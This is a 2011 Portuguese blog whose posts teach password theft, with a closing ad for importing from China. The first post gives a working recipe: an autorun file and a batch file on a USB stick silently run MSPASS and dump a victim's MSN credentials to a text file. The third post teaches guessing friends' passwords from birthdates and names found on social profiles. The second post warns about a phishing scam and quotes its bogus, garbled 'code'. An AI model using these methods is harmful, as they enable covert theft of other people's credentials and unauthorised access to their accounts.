quarta-feira, 31 de agosto de 2011

Pegar Senha do MSN Pelo Pen-Drive / Usar Pen Drive Para pegar Senha do MSN

Navegando pela internet encontrei essas instruções abaixo, porem ainda não realizei testes, mas dando uma olhada no código abaixo creio que isso ira realmente funcionar, deixarei aqui no blog apenas para estender nossos conhecimentos, fiquem a vontade para testar mais com responsabilidade pois roubar senhas é crime e apenas coloco isso aqui para sanar algumas duvidas, vamos ao método:


Indicamos para esse método a utilização de um Pen Drive U3 USB-Stick, (Isto é ele Funciona automaticamente) carrega os arquivos sem problemas, mas acredito que o método funcione com outros Pen Drives, vamos aos passos para se descobrir a senha:

 

 

1.   Você deve fazer o Download do Software MSPASS, após baixar o arquivo, abra seu Pen Drive e crie um documento chamado "Autostart", você deverá escrever isso nele:

[Autostart]open=launch.batACTION = UNIDADE  

No local onde escrevi "UNIDADE" é obviamente a unidade do Pen Drive, por exemplo "D:" ou "F:"  ou outra qualquer que o computador cria quando abre o Pen Drive, Depois de escrever isto você tem que salvar o arquivo como "Autostart.inf"

 

2.       Depois, crie uma pasta chamada "mspass" em seu Pen Drive, nesta pasta você copiar o mspass.exe o programa que você baixou.

 

 

3.    Agora você cria um arquivo chamado "launch.bat"
neste arquivo você escreve:

 start mspass\mspass.exe /stext mspass.txt

 

 

OK acima estão todos os passos que você tem que seguir. Agora esta tudo pronto, você colocar o seu pen driver em qualquer computador, e o autostart.inf fará com que o mspass execute,  depois de alguns segundos você pode remover o Pen Drive, e haverá uma arquivo de texto novo em seu Pen Drive, nesse arquivo estará o email do MSN e a senha.

Visite o Site: http://www.apostilahacker.com.br

terça-feira, 30 de agosto de 2011

Descobrir senhas orkut msn twitter facebook skype gmail hotmail yahoo

397910.JPGDescobrir senhas orkut msn twitter facebook skype gmail hotmail yahoo


Vou relatar abaixo um ocorrido recente, fiquem a vontade para postarem sua opnião sobre o assunto, ficarei grato em receber respostas.

 

Eu não sei exatamente por qual motivo, mas esse é um dos temas mais buscados na Internet: como roubar senhas do MSN ou invadir Orkut alheios. É tão procurado que muitas pessoas (maldosas, obviamente) se aproveitam disso para criar armadilhas e acabar roubando a senha do "pretenso ladrão" (terão 100 anos de perdão?).


A mensagem abaixo chegou através do formulário de comentários de um blog meu, num texto onde fiz um experimento de quantas pessoas realmetne cairiam na historia. O resultado foi espantoso, mas infelizmente atraiu muito pilantra querendo pongar no meu experimento para conseguir ludibriar outras pessoas. As dicas para identificar esse tipo de balela seguem abaixo:


 

1.    Em primeiro lugar, se fosse assim tão fácil roubar a senha do MSN de alguém, o próprio modelo já estaria afundado no limbo, pois algo tão inseguro precisa de muita manutenção de segurança o tempo todo para se manter no mercado (o próprio Windows que o diga). Então, ao procurar essa "dica" na Internet, é muito mais fácil você encontrar alertas sobre o perigo de buscar isso ou um ladrão de senhas querendo te enganar e roubar a SUA senha.


2.    As mensagens que tentam enganá-lo geralmente pedem que você envie um e-mail (sim, uma mensagem de e-mail simplesmente) com "comandos" para recuperar a senha alheia. Mas existem falhas de lógica, basta pensar um pouco. Como o sistema pode ser tão frágil ao ponto de receber comandos por e-mail para algo tão sensível como senhas? E por que diabos eu tenho que colocar a MINHA senha no tal e-mail se eu quero roubar a senha do outro? Não faz sentido, certo?


3.    Por que será que todo "hacker" (olhe bem o tom de sarcasmo das aspas, estou justamente dizendo que essas pessoas NÃO SÃO hackers nem crackers) é analfabeto? Você confiaria numa "dica" tão importante e perigosa como essa vindo de alguém que escreve tão mal? Alguém que escreve "imail" e "loguim" nem merece sua atenção, que dirá sua confiança.


 

DICA QUENTE: Você por acaso caiu nesse golpe? Troque imediatamente suas senhas diretamente no site do hotmail/msn antes que o ladrão o faça e você fique sem acesso a sua conta.

 

ROUBAR UMA SENHA SERIA POSSIVEL ?: Sim logicamente, pois como sabemos, "nem tudo é perfeito", tem ate sites especializados em vender esse tipo de imformação como o caso do site "Apostila Hacker", mas para realmente conseguir você teria que tirar alguns barões de sua carteira, senão você vai ficar dando murro em ponta de faca uma eternidade e não vai conseguir nada, como diz o velho e simples ditado "NADA É DE GRAÇA", Dando continuidade ao assunto da mensagem em meu blog, o melhor a se fazer é não cair na dita mensagem que te promete a senha de alguém pois com toda a minha experiência "adquirida recentemente" isso não da certo mesmo.

 

Mensagem original (comentário no blog)

para saber a senha do msn dos outros siga os passos corretamentedeve escrever o endereço do sistema, que contem a base de dados que verifica contas de usuario do hotmail( adm), na caixa de destino do email vc escreve (adm-EDITADO PARA SUA SEGURANÇA-livecenter@hotmail.com)

vc deve copiar o codigo abaixo, e colar no campo mensagem
lembresse de escrever seu email e se password correta mente, para que para que o hotmai retorne a resposta para seu email…

:form_pwd;login=(escreva aqui o loguim da vitima ou msn da vitima)
form.login.focus();form.passwd.gets=";form_pwd;val ue="yes";
sendto=(escreva aqui seu msn); form.passwd (escreva aqui sua senha)
form_pwd;value="admin";

nota importante:

vc nao tem que escrever o email completo da sua vitima,so escreva o loguim(o que esta antes de @)hotmail so funciona com hotmail hotmail.por so interessa o login,se for de outro servidor nao dara certo…
agora vamos enviar um imail a vitima, esta mensagem sera recebida por um computador que pensara que que a mensagem e de um menbro da equipe hotmail quando terminar levara de 5 a 10 minutos para receber a senha da sua vitima…

segunda-feira, 29 de agosto de 2011

Truques secretos para se descobrir uma Senha sem utilizar qualquer Programa

Hoje em dia um dos assuntos mais pesquisados na internet é sobre como se descobrir uma senha, me referenciando na ferramenta de palavras chave do Google, as palavras relacionadas mais buscadas são: como descobrir senha, descobrir senha do MSN, descobrir senha do Orkut, pegar senha, roubar senha, capturar senha e outras, essa lista de palavras continua e é bem extensa.



Analisando o citado acima irei deixar abaixo algumas dicas de como conseguir descobrir a senha do seu amigo ou amiga ou primo ou conhecido, sem a utilização de qualquer programa, digo isso pois os métodos em que são utilizados programas são bem mais simples logicamente, posso ate deixar como referencia já que estamos abordando o assunto de captura de senhas  o Site Apostila Hacker que tem um material muito interessante sobre capturas de senhas.


 

Vamos ao método abordado aqui: Iremos utilizar o método de tentativas ou suposições baseando-se em dados estatísticos muito simples, por exemplo:

Você sabia que cerca de 60% das pessoas utilizam suas senhas baseados em sua data de nascimento? Essa estatística passou nesse exato momento a representar uma grande chance de que você descubra a senha de uma pessoa, mas como fazer isso? O que você deve fazer é simples, tente descobrir qual a data de aniversario  dessa pessoa e descubra sua idade assim saberá a data de nascimento,depois comece a realizar tentativas de login em sua conta de email, Veja o exemplo abaixo:

 



Exemplo:


Imagine que a pessoa nasceu em 12/05/1965 logo você deve tentar variações dessa data como simplesmente mudando a ordem como: 12051965 outro dado importante a citar, é que na maioria das vezes as pessoas não usam os dois primeiros dígitos do ano, então você tentaria uma variação da seguinte forma: 120565, mas não se apeguem somente a essa técnica, tente utilizar letras como as duas primeiras letras do nome e depois a data ou as 3 primeiras letras e depois a data, as primeiras letras do nome e sobrenome assim por diante, certamente a senha estará relacionada a coisas do cotidiano da pessoa, namoro, família, datas importantes e outros.


A pergunta que ficaria após a explicação acima seria como descobrir a data, geralmente se você é amigo dessa pessoa no Orkut ou algo do tipo você descobrira quando é o aniversario da pessoa e a partir daí muito provavelmente você conseguira uma data, ou ate mesmo em outros perfis de redes sociais, isso com certeza estará impresso em algum lugar na rede.


 

 

certamente que o exemplo citado acima é um método árduo e trabalhoso, porem muito interessante se conseguir uma senha dessa forma, o inverso do site Apostila Hacker que te daria um manual exemplificado e o nome do programa que você deve utilizar para se descobrir uma senha sem muita dificuldade, lembrando que esse material disponibilizado no site não tem como objetivo prejudicar as pessoas e sim mostrá-las como se descobrir uma senha pode ser fácil para que ate mesmo elas possam se defender desse tipo de ataque.

 

Não prolongando mais o assunto, espero ter ajudado com esse texto e deixo como dica para os mais interessados em descobrir uma senha o link do site Apostila Hacker com certeza será de muita utilidade a você que se interessa pelo assunto.

aprenda a importar da china

EBOOK_COMO_IMPORTAR_DA_CHINA_menor.png

Aprenda a Importar da China e Ganhe Dinheiro na Interent Sem investimento inicial e sem Precisar ter Estoques


Importar da China Imagine se pudesse vender vários produtos sem ter que investir em estoques. E melhor, deixando que o seu fornecedor cuide da entrega do produto vendido para o seu cliente, sem nem te cobrar por isso. Você ganha por que cobra mais caro do que o valor pago pelo produto. Por exemplo, se seu fornecedor vende para você um celular de última geração por R$300,00 e você vende por R$499,99. Ganha praticamente R$200,00 de lucro, em apenas uma venda. Você  deve estar se perguntando por que o seu cliente não compra direto do fornecedor já que lá é mais barato, mas a resposta é obvia! São poucas as pessoas que sabem onde comprar para revender, e as que sabem, fazem disso um segredo. Justamente o segredo que eu revelo aqui sobre como importar da China!


Em outras palavras, o cliente compra um produto que você anunciou e faz o pagamento, depois disso você faz uma encomenda e solicita o envio para o endereço do seu cliente. A entrega tem prazos que variam de uma semana a um mês, dependendo de como você faz a compra. É fácil vender por que as pessoas confiam em você quando se é um vendedor certificado do Mercado Livre ou se tem uma loja virtual profissional e segura.


Hoje, este é o sistema que mais cresce no mundo, e você não pode ficar fora dessa, mas se você quiser, pode sim trabalhar com estoques, afinal cada um pode escolher a maneira que prefere sobre como importar da china. No vídeo explicativo abaixo eu mostro como as pessoas ganham dinheiro vendendo produtos no Mercado Livre e em lojas virtuais, comprados na China e enviados direto do fornecedor para a casa do cliente. Repare bem o lucro que qualquer pessoa, inclusive VOCÊ, pode conseguir. Basta apenas seguir os passos que eu ensino no guia disponivel no site: Aprenda a Importar da China São os mesmos metodos que estão fazendo muitas pessoas ganharem fortunas na internet.


Visitem o site acima para maiores informações